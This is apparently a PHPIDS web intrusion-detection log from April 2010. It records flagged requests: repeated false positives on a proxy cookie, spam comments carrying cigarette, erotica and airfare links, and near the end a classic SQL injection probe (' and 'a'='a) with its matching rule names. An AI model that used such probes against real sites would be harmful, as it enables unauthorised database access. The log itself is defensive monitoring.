Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122320
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122321
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122322
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122323
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122324
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122325
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122326
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122327
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122328
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:03
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122293
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:02
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122294
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:02
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122295
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:02
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122296
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:02
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122297
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:02
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122298
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:02
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122299
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:02
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122300
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:02
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122301
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:02
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122302
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:02
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122303
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:02
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122304
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:02
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122305
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:02
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122306
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:02
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122285
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:01
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122286
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:01
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122287
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:01
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122288
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:01
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122289
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:01
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122290
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:01
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122291
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:01
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122292
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 13:39:01
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122283
Name:REQUEST.codeme
Value:So where it to find, <a href= http://freecigarettecoupons.tumblr.com/ >Best free cigarette coupons</a>, [url= http://freecigarettecoupons.tumblr.com/ ]Best free cigarette coupons[/url], 106,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-22 13:23:33
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122284
Name:POST.codeme
Value:So where it to find, <a href= http://freecigarettecoupons.tumblr.com/ >Best free cigarette coupons</a>, [url= http://freecigarettecoupons.tumblr.com/ ]Best free cigarette coupons[/url], 106,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-22 13:23:33
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122281
Name:REQUEST.codeme
Value:Thank you, <a href= http://discountcigarettes.tumblr.com/ >Cheap discount cigarettes</a>, [url= http://discountcigarettes.tumblr.com/ ]Cheap discount cigarettes[/url], 645120,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-22 12:44:08
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122282
Name:POST.codeme
Value:Thank you, <a href= http://discountcigarettes.tumblr.com/ >Cheap discount cigarettes</a>, [url= http://discountcigarettes.tumblr.com/ ]Cheap discount cigarettes[/url], 645120,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-22 12:44:08
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122279
Name:REQUEST.codeme
Value:Great, <a href= http://printablecigarettecoupons.tumblr.com/#1 >Buy printable cigarette coupons</a> [url=http://printablecigarettecoupons.tumblr.com/#1]Buy printable cigarette coupons[/url], 020,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-22 12:04:49
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122280
Name:POST.codeme
Value:Great, <a href= http://printablecigarettecoupons.tumblr.com/#1 >Buy printable cigarette coupons</a> [url=http://printablecigarettecoupons.tumblr.com/#1]Buy printable cigarette coupons[/url], 020,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-22 12:04:49
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122277
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 11:43:43
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122278
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-22 11:43:43
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122275
Name:REQUEST.codeme
Value:Incredible site!, <a href= http://freeeroticstories.tumblr.com/ >free erotic stories here</a>, [url= http://freeeroticstories.tumblr.com/ ]free erotic stories here[/url], 84063,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-22 10:45:59
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122276
Name:POST.codeme
Value:Incredible site!, <a href= http://freeeroticstories.tumblr.com/ >free erotic stories here</a>, [url= http://freeeroticstories.tumblr.com/ ]free erotic stories here[/url], 84063,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-22 10:45:59
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122273
Name:REQUEST.codeme
Value:I have the same., <a href= http://noweroticstories.tumblr.com/ >erotic stories</a>, [url= http://noweroticstories.tumblr.com/ ]erotic stories[/url], brrp,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-22 10:06:27
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122274
Name:POST.codeme
Value:I have the same., <a href= http://noweroticstories.tumblr.com/ >erotic stories</a>, [url= http://noweroticstories.tumblr.com/ ]erotic stories[/url], brrp,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-22 10:06:27
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122271
Name:REQUEST.codeme
Value:best for you, <a href= http://cheapestairfaretickets.tumblr.com/#1 >cheapest airfare tickets for you</a> [url=http://cheapestairfaretickets.tumblr.com/#1]cheapest airfare tickets for you[/url], >:[[[,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-22 09:24:42
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122272
Name:POST.codeme
Value:best for you, <a href= http://cheapestairfaretickets.tumblr.com/#1 >cheapest airfare tickets for you</a> [url=http://cheapestairfaretickets.tumblr.com/#1]cheapest airfare tickets for you[/url], >:[[[,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-22 09:24:42
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122269
Name:REQUEST.codeme
Value:So where it to find?, http://cheapstudentairfares.tumblr.com/ cheap student airfares, :))),
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:10
Created:2010-04-22 08:45:14
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7

ID:122270
Name:POST.codeme
Value:So where it to find?, http://cheapstudentairfares.tumblr.com/ cheap student airfares, :))),
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:10
Created:2010-04-22 08:45:14
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7

ID:122267
Name:REQUEST.page
Value:videos/keyllama-<acronym title=
Page:/i.php?page=videos/keyllama-%3Cacronym%20title=
IP:67.195.111.36
Impact:8
Created:2010-04-22 08:14:09
Details:
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122268
Name:GET.page
Value:videos/keyllama-<acronym title=
Page:/i.php?page=videos/keyllama-%3Cacronym%20title=
IP:67.195.111.36
Impact:8
Created:2010-04-22 08:14:09
Details:
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122265
Name:REQUEST.codeme
Value:Great site. Keep doing., <a href= http://lastminuteairfare.tumblr.com/#1 >Real last minute airfare</a> [url=http://lastminuteairfare.tumblr.com/#1]Real last minute airfare[/url], %(((,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-22 08:05:52
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++::

ID:122266
Name:POST.codeme
Value:Great site. Keep doing., <a href= http://lastminuteairfare.tumblr.com/#1 >Real last minute airfare</a> [url=http://lastminuteairfare.tumblr.com/#1]Real last minute airfare[/url], %(((,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-22 08:05:52
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++::

ID:122263
Name:REQUEST.page
Value:security/networkprinterhacking' and 'a'='a
Page:/i.php?page=security/networkprinterhacking'%20and%20'a'='a
IP:95.121.154.27
Impact:34
Created:2010-04-22 07:55:10
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122264
Name:GET.page
